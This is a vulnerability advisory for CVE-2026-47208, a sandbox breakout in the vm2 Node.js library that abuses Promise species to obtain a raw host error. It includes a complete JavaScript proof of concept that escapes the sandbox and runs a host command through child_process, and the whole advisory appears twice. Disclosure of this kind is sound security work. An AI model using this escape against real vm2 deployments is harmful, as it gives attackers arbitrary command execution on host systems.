β Back to CVE List
CVE-2026-47208NVD
Description
### Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
The `localPromise` constructor was changed to call `this.then(undefined, eater)` to ensure a rejected promise is always used. However, this is missing a call to `resetPromiseSpecies` to ensure that `this` has no special species. Since the species can be changed a custom promise can be used to supply a custom reject method to the executor allowing to get a raw host error and escape the sandbox.
### PoC
```js
const {VM} = require("vm2");
const vm = new VM();
vm.run(`
class E extends Error {}
function so(d) {
if (d > 0) so(d-1);
const e = new E();
e.stack;
throw e;
}
let ex, ct;
class FakePromise extends Promise {
static get [Symbol.species](){return ct;}
}
function doCatch(f) {
ex=undefined;
const p=Promise.withResolvers();
ct = function(e){e(f, v=>{ex=v;p.resolve();})};
new FakePromise(r=>r());
return p.promise;
}
(async function f(s) {
let min = s;
let max = 100000;
while (min<max) {
const mid = (min+max)>>1;
await doCatch(()=>so(mid));
if (ex.name==="RangeError" && !(ex instanceof RangeError)) {
ex.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
return;
}
if (ex instanceof E) {
min = mid+1;
} else {
max = mid;
}
}
f(s+1);
})(0);
`);
```
### Impact
Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
The `localPromise` constructor was changed to call `this.then(undefined, eater)` to ensure a rejected promise is always used. However, this is missing a call to `resetPromiseSpecies` to ensure that `this` has no special species. Since the species can be changed a custom promise can be used to supply a custom reject method to the executor allowing to get a raw host error and escape the sandbox.
### PoC
```js
const {VM} = require("vm2");
const vm = new VM();
vm.run(`
class E extends Error {}
function so(d) {
if (d > 0) so(d-1);
const e = new E();
e.stack;
throw e;
}
let ex, ct;
class FakePromise extends Promise {
static get [Symbol.species](){return ct;}
}
function doCatch(f) {
ex=undefined;
const p=Promise.withResolvers();
ct = function(e){e(f, v=>{ex=v;p.resolve();})};
new FakePromise(r=>r());
return p.promise;
}
(async function f(s) {
let min = s;
let max = 100000;
while (min<max) {
const mid = (min+max)>>1;
await doCatch(()=>so(mid));
if (ex.name==="RangeError" && !(ex instanceof RangeError)) {
ex.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
return;
}
if (ex instanceof E) {
min = mid+1;
} else {
max = mid;
}
}
f(s+1);
})(0);
`);
```
### Impact
Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.